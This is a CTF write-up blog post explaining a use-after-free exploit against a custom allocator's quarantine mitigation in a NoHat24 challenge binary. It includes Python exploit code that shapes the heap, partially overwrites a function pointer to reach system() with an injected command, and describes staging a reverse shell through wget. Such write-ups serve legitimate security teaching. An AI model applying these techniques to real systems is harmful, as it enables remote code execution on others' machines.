Exploiting a Quarantine UAF Mitigation on a Custom Allocator Challenge

Introduction

In the previous blog post (A Reverse Engineering Walkthrough Journey) we have covered a walkthrough guide to solve the Reverse Engineering challenge written for the NoHat24 security conference. In this blog post, we are going to cover the binary exploitation challenge that involves a custom userland allocator that has been specifically developed for this challenge. Writing our own allocator, remotely inspired from the kernel SLUB allocator, was a really fun and educational experience. We have implemented an Use-After-Free quarantine mitigation to prevent its exploitation, was it good enough?

Introducing the Custom Allocator

The custom allocator source code was available through an HTTP web interface and can now be download directly from here. Two files, hmalloc.h and hmalloc.c, contains the whole implementation of the custom allocator that replaces the standard glibc malloc. The following diagram and structs describes the allocator design:

struct list_head{
  struct list_head* next;
  struct list_head* prev;
};

struct bucket{
  struct list_head  buckets;
  /* Offset of the available alloc inside the bucket */
  uint16_t  offset;
  /* How many allocs are freed */
  uint8_t   freelist_count;
  uint8_t   freelist[MAX_ALLOCS];
  void*     allocs[];
};

/* Single allocations just contain the size of the alloc as metadata */
struct alloc{
  uint16_t size;
  void*   user[];
} __attribute__((packed));

The target allocator, inspired from the kernel SLUB allocator, has a simple “bucket” concept. Each allocation size (from 16 to 1024) has its own memory region retrieved from mmap (through __init_bucket) and it is considered a SMALL_BUCKET, while larger buckets (LARGE_BUCKETS) are not handled from the allocator. A Bucket Master Control (bucket_master_ctrl global variable inside hmalloc.c) is used to store buckets’ addresses using an offset that can be used to retrieve the requested bucket for the needed size. The size of the allocation is the offset minus the size of a pointer. For example, the bucket address for 32 bytes allocations is at offset 24 (32-8).

When malloc is called the first time with a specific size, that is always rounded to the nearest power of two starting from 32 (e.g. 32, 64, 128, 256, 512, 1024), the bucket is allocated through __init_bucket and referred to as the current_bucket. The current bucket is the bucket from where we try to initially allocate from. It can be retrieved, once allocated, using __get_bucket. Each allocation, named alloc inside the source code, contains just the size of the allocation as metadata and alloc->user is the returned malloc pointer. When an alloc is allocated from a bucket, the bucket->offset is incremented by one and used for the next allocations to return subsequent memory addresses (it is always multiplied with the allocation size). The offset does not just provides the capability to return new allocations but also marks and identifies freed allocations inside the bucket. A freelist is implemented to first return freed memory (to avoid fragmentation) with a LIFO mechanism. bucket->freelist is an array of freed allocs (based on their offsets) that can be accessed with the bucket->freelist_count that is incremented every time an alloc is freed and decremented when a freed allocation is returned back to the user. This “dynamic” array permits to handle the freelist pretty easily and is the first path to return an allocation from the __malloc logic.

When the maximum number of allocations ((PAGE_SIZE - sizeof(struct bucket)) / alloc_size) is reached for a bucket, a new bucket is created (through new mmap memory) and linked through the list_head next and prev members.

old_current_bucket->buckets.next = (struct list_head*) &current_bucket->buckets.next;
current_bucket->buckets.prev = (struct list_head*) &old_current_bucket->buckets.next;

The linked list permits to have more buckets linked together for each allocation size. When the current bucket is full (e.g. it is not possible to re-allocate freed allocs neither new allocs) previous and next buckets are verified (traversing the linked list backwards and forwards) and an allocation is returned if one of them contains a freed alloc on its freelist. Also, if the found bucket contains more than a specific amount of freed elements (FREELIST_REPLACE_BUCKET_THRESHOLD) it is replaced as the current bucket from the bucket_master_ctrl (through __update_master_ctrl_bucket).

When free is called with a pointer, the alloc struct is retrieved through ptr - sizeof(struct alloc) and the bucket obtained masking the pointer with 0xfff (memory returned from mmap is always page aligned). In order to calculate its offset inside the bucket, the allocation size retrieved from the metadata of the alloc is used as a dividend to the allocation address minus bucket->allocs (e.g. the first alloc is 0, the second 1, the third 2 and so on). The bucket->freelist[] array is updated with the calculated offset and bucket->freelist_count incremented by one.

Freelist quarantine mitigation

Before leaving the free function, a global freelist_quarantine_time variable is set with the current time. When verifying the freelist of the current bucket, the function __is_freelist_available verify its availability. It is possible to return a freed alloc only if ten seconds (FREELIST_QUARANTINE_WAIT) are passed from the last freed element:

bool __is_freelist_available(){
#ifdef FREELIST_QUARANTINE
  if((time(NULL) - freelist_quarantine_time) < FREELIST_QUARANTINE_WAIT){
    DEBUG_PRINT("[DEBUG] Freelist is quarantined\n");
    return false;
  }
  return true;
#endif
  return true;
}

This mitigations is aimed to prevent the immediate re-use of freed allocations (Use-After-Free vulnerabilities).

Freelist quarantine Weakness

However, the mitigation is not bullet proof, and this is the intended objective of the CTF. The freelist timer is only checked while searching for freed allocs inside the same bucket, but not when traversing. Suppose the following scenario:

Two buckets (bucket_1 and bucket_2) are fully allocated (e.g. no available or freed allocations). bucket_2 is the “current” one (the one registered in the Bucket Master Control).
An alloc is freed from bucket_1.
When malloc is called (with the same size of the two buckets) the freelist of bucket_2 is not available while, with traversing, the just freed alloc from bucket_1 is immediately available.

The described scenario can be useful to exploit an immediate UaF condition.

Main binary logic

The main binary logic (main.c) is pretty simple. It reads from stdin 4096 bytes and parses it line by line, searching for commands to execute inside a switch statement. Each line must begin with a valid command (CMD_CREATE, CMD_ADD, CMD_DELETE, CMD_SELL, CMD_DROP) and follows a command specific format. For example, the CMD_CREATE command allocates a struct object (using malloc) where malloc is also used to allocate object->name and object->description using strlen with some size validation. At the end of the command, the three function pointers (sell, add and drop) are respectively set with function_sell, function_add and function_drop, just like a primitive OOP language.
This is the mentioned struct:

struct object{
  int   id;
  int   price;
  char* name;
  char* description;
  int   stock;
  int   earnings;
  void (*sell) (struct object* this);
  void (*add) (struct object* this);
  void (*drop) (struct object* this);
};

Also, when a new object is allocated, an array of object pointers (objs) is updated to store all of them. The array is later used for the vtable functions (sell, add and drop) and to delete an object based on its specified id.

The vulnerability (UAF)

The vulnerability is pretty straightforward: when an object is freed (through CMD_FREE), the objs array is not updated and the dangling pointer can be still accessed without further validations from another command (Use-After-Free) or itself (Double Free).
However, there is just one big obstacle: the freelist quarantine mitigation does not permit an immediate Use-After-Free. In order to exploit the UAF, it is necessary to re-create an heap layout similar to the one described in “Freelist quarantine Weakness”, where we can trigger the UAF against an allocation from a non current bucket.

Exploitation

Objective

Let’s first declare an objective. As simple as it sounds, we want to compromise the binary application (that is exposed through socat) and read the flag. We have a UAF primitive on a struct object that contains interesting members: dynamic strings (that we can use to overlap the freed allocation) and three function pointers. Function pointers, that behave like a vtable, seems like a really juicy target since they are allocated in the heap (inside the object structure) and can be triggered from multiple commands. Name and description members are really interesting allocations that can be used to replace the freed alloc due to their flexible size based on user input.

Also, since we have a single interaction with the program (we pass everything through stdin once) we cannot use read primitives or similar to leak ASLR. We can go for a bruteforce or a partial overwrite in order to don’t mess too much with randomized pointers.

Heap shaping to bypass the quarantine

With a clearer path in mind, let’s start to create the UAF state with python step by step:

objs = []
content = ""
# Objective:
# Allocate 2 64 bytes buckets and make them full
# 520 = sizeof(struct bucket)
# 4096 - 520 = 3576 / 64 = 55
for n in range(0, 55 * 2):
    obj_id = pack("<h", int(n)).decode()
    objs.append(obj_id)
    # print_stderr("[*] Creating object {}".format(n))
    # Create
    content += "\x10" # CMD_CREATE
    content += obj_id
    content += "\x16\x00"
    content += "\x41" * 20 + "\x00"
    content += "\x42" * 4 + "\x00"
    content += "\n"

We fulfill two buckets (bucket_1 and bucket_2) with 110 allocations of struct object. The size of struct object is 58, hence it goes into the bucket of 64 bytes allocations (we can call it bucket_64). The bucket_64 can contains up to 55 allocations since the PAGE_SIZE memory region (4096) minus the size of the struct bucket metadata (520) and divided by its size (64), it’s 55.

# DELETE (Free)
content += "\x12"
content += objs[0]
content += "\n"

# DELETE (Free)
content += "\x12"
content += objs[1]
content += "\n"

We then proceed to free the first two allocations from bucket_1. We free two of them since the last one (due to the LIFO freelist order) will be replaced, using the CMD_CREATE command, with another struct object (malloc(sizeof(struct object));) and initialized with zeros (removing the possibility of a partial overwrite to bypass ASLR). The first freed allocation, instead, can be replaced with arbitrary user input due to the dynamic allocation through strlen. Due to this function, however, we are limited to its internal behaviors (e.g. it is not possible to have NULL bytes inside our payload).

Partial Overwrite

We can create, through CMD_CREATE, a fake object inside the name or the description string allocation, by making its size falling inside the bucket_64, in order to trigger the UAF against it.
We can perform a partial overwrite through the memcpy function (on the freed object) by replacing one or two bytes in order to not affect ASLR at all. execute_system is an interesting function that accepts a char pointer and pass it as a parameter to system, allowing the execution of arbitrary shell code. It can be a really interesting primitive due to a crucial thing: the rdi register (e.g. the first parameter) is the object itself (this) for function pointers. This means that, if we can redirect the execution to execute_system, we control entirely the first parameter that is the command to be executed! In order to see what we need to partially overwrite, we can execute objdump against the binary:

$ objdump -D -M intel main | grep '<execute_system\|function_drop'
0000000000001270 <execute_system>:
00000000000012c0 <function_drop>:

The function_drop address is 00000000000012c0, while execute_system is 0000000000001270. If we overwrite the last byte of the object->drop pointer with 0x70 and we execute the CMD_DROP command later, we can trigger the execution of system with input in our control (the last allocated object itself):

    # ID & price
    fake_obj = "AA;$({});#".format(cmd)
    #fake_obj += "\x41" * 0x2c
    fake_obj += "\x41" * ( 0x30 - len(fake_obj) )
    # CMD_DROP function pointer => @execute_system
    # @execute_system
    fake_obj += "\x70" + "\x00"

    # Create => alloc bucket1->freelist[1]
    content += "\x10"
    content += "\x37\x13"  # sh
    content += "\x16\x00"
    # Name: system payload
    content += "BB\x00"
    # Description: alloc on bucket1->freelist[0] (obj[0])
    content += fake_obj
    content += "\n"

    # CMD_DROP => Trigger arbitrary function call
    content += "\x14"
    content += "\x41\x41"
    content += "\n"

Since the struct object allocation is limited in size for a direct reverse shell, the vulnerability is exploited three times to first upload a complete reverse shell through wget, chmod and finally execute it.

Alternative Solution (Double Free)

An alternative, originally not the intended solution, can be to exploit the Double Free vulnerability instead. It is possible to return the same alloc twice by inserting (through exploitation) the same freelist offset inside the bucket->freelist and achieve the same objective. If you have solved the challenge in that way at the NoHat CTF or in a different moment, we are really curious about that, let us know!

Conclusion

The final exploit can be found here. Hope you have enjoyed this two article series on some of our CTF write-ups for the NoHat24 CTF event. We have already planned some hardware, firmware and fuzzing articles for this December. If your are interested, stay tuned for that and, as always, happy hacking!

Interested in more CTFs like this one to prove your skills? Check out play.pwnx.io!

About Post Author

Alessandro Groppo

alessandro@hacktivesecurity.com

Happy

0 %

Sad

0 %

Excited

100 %

Sleepy

0 %

Angry

0 %

Surprise

0 %

Exploiting a Quarantine UAF Mitigation on a Custom Allocator Challenge

Introduction

Introducing the Custom Allocator

Freelist quarantine mitigation

Freelist quarantine Weakness

Main binary logic

The vulnerability (UAF)

Exploitation

Objective

Heap shaping to bypass the quarantine

Partial Overwrite

Alternative Solution (Double Free)

Conclusion

About Post Author

Alessandro Groppo

Average Rating

Leave a Reply Cancel reply

Recent Posts

Recent Comments

Archives

Categories

Meta

Top Category

Application Security

Mobile

Meet The Team

Introduction

Introducing the Custom Allocator

Freelist quarantine mitigation

Freelist quarantine Weakness

Main binary logic

The vulnerability (UAF)

Exploitation

Objective

Heap shaping to bypass the quarantine

Partial Overwrite

Alternative Solution (Double Free)

Conclusion

Average Rating

Leave a Reply Cancel reply

Related Post

Recent Posts

Recent Comments

Archives

Categories

Meta

Recent Post

Top Category